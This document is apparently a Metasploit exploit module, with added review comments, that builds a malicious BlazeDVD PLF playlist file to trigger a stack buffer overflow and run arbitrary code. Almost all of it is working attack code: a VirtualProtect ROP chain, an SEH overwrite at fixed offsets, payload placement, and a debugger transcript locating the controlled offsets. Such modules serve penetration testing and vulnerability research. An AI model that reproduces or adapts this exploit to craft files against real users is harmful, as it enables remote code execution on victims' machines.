GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/fileformat/blazedvd_plf.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  # FILEFORMAT mixin: supplies file_create and the FILENAME option handling.
  include Msf::Exploit::FILEFORMAT

  # Module metadata: name, description, authors, references, payload
  # constraints and the two supported targets (index 0, 'BlazeDVD 6.2',
  # is the DefaultTarget).
  #
  # @param info [Hash] metadata merged through update_info
  def initialize(info = {})
    super(update_info(info,
      # NOTE(review): the title says 6.1 while the description and the
      # Targets list cover 5.1 and 6.2 - confirm the intended version string.
      'Name' => 'BlazeDVD 6.1 PLF Buffer Overflow',
      'Description' => %q{
        This module exploits a stack over flow in BlazeDVD 5.1 and 6.2. When
        the application is used to open a specially crafted plf file,
        a buffer is overwritten allowing for the execution of arbitrary code.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'MC', # Developed target 5.1
          'Deepak Rathore', # ExploitDB PoC
          'Spencer McIntyre', # Developed target 6.2
          'Ken Smith' # Developed target 6.2
        ],
      # NOTE(review): the CVE is a 2006 id while DisclosureDate below is
      # 2009-08-03 (matching the BID); confirm the references are intended.
      'References' =>
        [
          [ 'CVE' , '2006-6199' ],
          [ 'EDB', '32737' ],
          [ 'OSVDB', '30770' ],
          [ 'BID', '35918' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'AllowWin32SEH' => true
        },
      # Payload constraints shared by both targets: at most 750 bytes, no
      # NUL / LF / SUB bytes, and no NOP sled generated by the framework.
      'Payload' =>
        {
          'Space' => 750,
          'BadChars' => "\x00\x0a\x1a",
          'DisableNops' => true
        },

      'Platform' => 'win',
      'Targets' =>
        [
          # Target 0: payload is prefixed with a fixed 6-byte stack pivot
          # and placed after the ROP chain built by rop_chain.
          [ 'BlazeDVD 6.2',
            {
              'Payload' =>
                {
                  # Stackpivot => add esp,0xfffff254
                  'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
                }
            }
          ],
          # Target 1: 'Ret' is the address written into the file at offset
          # 868 by exploit; see the debugger transcript after the class for
          # how it was located. Payload is restricted to upper-alphanumeric
          # encoding.
          [ 'BlazeDVD 5.1',
            {
              'Ret' => 0x100101e7,
              'Payload' =>
                {
                  'EncoderType' => Msf::Encoder::Type::AlphanumUpper
                }
            }
          ],
        ],
      'Privileged' => false,
      'DisclosureDate' => '2009-08-03',
      'DefaultTarget' => 0,
      # Reliability notes: the target application goes down on use and the
      # effect is visible on screen to the user who opens the file.
      'Notes' =>
        {
          'Stability' => [ CRASH_SERVICE_DOWN, ],
          'SideEffects' => [ SCREEN_EFFECTS, ],
        },
    ))

    # Output file name; defaults to msf.plf.
    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']),
      ])
  end

  # Builds the ROP chain for the 'BlazeDVD 6.2' target as a string of
  # 32-bit little-endian addresses (pack "V*") taken from EPG.dll and
  # SkinScrollBar.Dll.
  #
  # NOTE(review): only the 6.2 branch assigns rop_gadgets, so calling this
  # for any other target.name leaves it nil and the final `.flatten` raises
  # NoMethodError. exploit only calls it for 6.2, so the gap is latent; an
  # explicit `else raise` would make the contract visible.
  #
  # @return [String] packed gadget addresses
  def rop_chain
    # rop chain generated with mona.py - www.corelan.be
    case target.name
    when 'BlazeDVD 6.2'
      rop_gadgets = [ ]
      # 0x6162e802 RETN (ROP NOP) [EPG.dll]
      # eight copies of the ROP NOP occupy indexes 0..7
      rop_gadgets.fill(0x6162e802, 0..7)
      rop_gadgets += [
        0x61636758, # POP EAX # RETN [EPG.dll]
        0x10011108, # ptr to &VirtualProtect() [IAT SkinScrollBar.Dll]
        0x616306ed, # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll]
        0x616385d8, # XCHG EAX,ESI # RETN 0x00 [EPG.dll]
        0x61628ea2, # POP EBP # RETN [EPG.dll]
        0x616069a1, # push esp # ret 0x04 [EPG.dll]
        0x61626702, # POP EAX # RETN [EPG.dll]
        0xfffffdff, # Value to negate, will become 0x00000201
        0x61627d9c, # NEG EAX # RETN [EPG.dll]
        0x61640124, # XCHG EAX,EBX # RETN [EPG.dll]
        0x61629938, # POP EAX # RETN [EPG.dll]
        0xffffffc0, # Value to negate, will become 0x00000040
        0x61627d9c, # NEG EAX # RETN [EPG.dll]
        0x61608ba2, # XCHG EAX,EDX # RETN [EPG.dll]
        0x61612f5a, # POP ECX # RETN [EPG.dll]
        0x100142ab, # &Writable location [SkinScrollBar.Dll]
        0x616313ac, # POP EDI # RETN [EPG.dll]
        0x6162e588, # RETN (ROP NOP) [EPG.dll]
        0x6162d638, # POP EAX # RETN [EPG.dll]
        0x90909090, # nop
        0x61620831, # PUSHAD # RETN [EPG.dll]
      ]
    end
    # flatten is a no-op here (the array is already flat); "V*" packs each
    # element as an unsigned 32-bit little-endian value.
    return rop_gadgets.flatten.pack("V*")
  end

  # Assembles the PLF file contents for the selected target and writes it
  # through file_create under the FILENAME option. The per-target layout is
  # fixed by the offsets and sizes below; statement order matters.
  def exploit
    case target.name
    when 'BlazeDVD 5.1'
      # 6024-byte upper-alpha filler (the !pattern_offset runs in the
      # transcript after the class were done at this length), then three
      # fixed regions overwritten in place:
      #   868..875  short jump + 2 filler bytes + target.ret (little-endian)
      #   876..887  12 NOPs
      #   888..     the encoded payload
      plf = rand_text_alpha_upper(6024)
      plf[868,8] = Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2) + [target.ret].pack('V')
      plf[876,12] = make_nops(12)
      plf[888,payload.encoded.length] = payload.encoded
    when 'BlazeDVD 6.2'
      # 260 bytes of alphanumeric filler, the packed ROP chain, then the
      # encoded payload (which carries the PrependEncoder stack pivot).
      plf = rand_text_alphanumeric(260)
      plf << rop_chain
      plf << payload.encoded
    end

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(plf)
  end
end
=begin
0:000> !exchain
0012f2c8: 31644230
Invalid exception stack at 64423963
0:000> !pattern_offset 6024 0x31644230
[Byakugan] Control of 0x31644230 at offset 872.
0:000> !pattern_offset 6024 0x64423963
[Byakugan] Control of 0x64423963 at offset 868.
0:000> s -b 0x10000000 0x10018000 5e 59 c3
100012cd 5e 59 c3 56 8b 74 24 08-57 8b f9 56 e8 a2 3c 00 ^Y.V.t$.W..V..<.
100101e7 5e 59 c3 90 90 90 90 90-90 8b 44 24 08 8b 4c 24 ^Y........D$..L$
0:000> u 0x100012cd L3
skinscrollbar!SkinSB_ParentWndProc+0x1fd:
100012cd 5e pop esi
100012ce 59 pop ecx
100012cf c3 ret
=end